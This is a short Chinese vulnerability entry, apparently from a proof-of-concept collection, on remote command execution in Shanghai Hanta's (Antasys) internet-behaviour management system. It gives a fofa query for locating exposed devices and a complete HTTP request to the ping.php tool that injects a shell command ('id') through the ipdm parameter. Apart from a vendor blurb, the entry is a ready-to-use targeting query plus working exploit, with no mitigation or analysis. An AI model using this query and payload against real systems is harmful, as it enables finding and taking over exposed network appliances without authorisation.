# 上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞
上海汉塔网络科技有限公司多年来一直专注于网络应用的软件开发，在网络安全、网络协议分析、网络数据流控制等领域有着丰富的经验和雄厚的技术实力。同时，公司积累了丰富的数据通信及网络安全产品研发、生产、销售及服务经验，是行业领先的新一代信息安全产品供应商，目前拥有上网行为管理、IPSecVPN、SSLVPN、流量控制等多款产品。上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞

## fofa
```javascript
body="Antasys"
```

## poc
```javascript
GET /dgn/dgn_tools/ping.php?ipdm=127.0.0.1;id;&ps=64&cnt=1 HTTP/1.1
Host: 
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=515a7b9608e8a01fd03889ccf28bf590
Upgrade-Insecure-Requests: 1
```

![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1734321123435-1f8a2319-92ab-4659-80cf-cf44cef5073a.png)

